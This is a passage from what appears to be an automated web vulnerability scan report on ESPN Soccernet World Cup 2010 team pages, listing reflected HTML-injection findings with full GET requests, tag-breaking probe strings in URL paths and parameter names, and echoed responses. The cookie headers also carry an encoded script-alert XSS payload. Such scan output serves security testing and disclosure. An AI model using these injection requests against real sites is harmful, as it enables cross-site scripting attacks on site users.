Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT
Content-Length: 81605
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat"> ...[SNIP]...
2.96. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/482/portugal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:26 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT
Content-Length: 81713
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:05 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT
Content-Length: 81813
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players"> ...[SNIP]...
2.98. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4860/north-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT
Content-Length: 81921
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT
Content-Length: 81717
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist"> ...[SNIP]...
2.100. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/624/algeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT
Content-Length: 81825
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:19:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT
Content-Length: 81475
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss"> ...[SNIP]...
2.102. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/627/japan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT
Content-Length: 81583
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
